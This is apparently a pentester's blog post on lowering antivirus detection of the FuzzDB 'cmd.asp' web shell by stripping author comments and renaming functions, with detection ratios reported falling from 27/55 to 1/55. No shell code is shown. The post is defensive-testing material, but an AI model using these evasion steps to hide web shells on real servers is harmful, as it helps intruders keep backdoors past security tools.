Avoiding AntiVirus Detection - Lame Way

In most of pentest engagement we tend to upload the clean web-shells in order to prevent customer getting backdoored by our malicious webshell which we download from internet. Most trusted webshells which I personally use and ask others too is FuzzDB. Pretty basic webshells, but it helps to prove the vulnerability and its impact to customer. But since the release date of FuzzDB, most antivirus companies got the signature for most of them and flag it as malicious, in turn blocking us from uploading/executing the same.

Lets just scan, how malicious is our sample webshell i.e.: cmd.asp
Oops the clean webshell is detected as malicious, with pretty high detection ratio. (27/55)

Come on now lets just strip-off the below developer comments from webshell and try it again.

cmd.asp = Command Execution
by: Maceo
modified: 25/06/2003

Ohh now we have some less detection ratio compared to earlier case. (10/55)

We still have hope, to decrease the detection ratio more. Lets try replacing the function names and trying again.

Below is sample of find and replace game.

 Voila, we decreased the detection ratio too low. (1/55)

Reference:- https://code.google.com/p/fuzzdb/
Got the thought about this from : https://www.offensivebits.com/?p=89


Popular Posts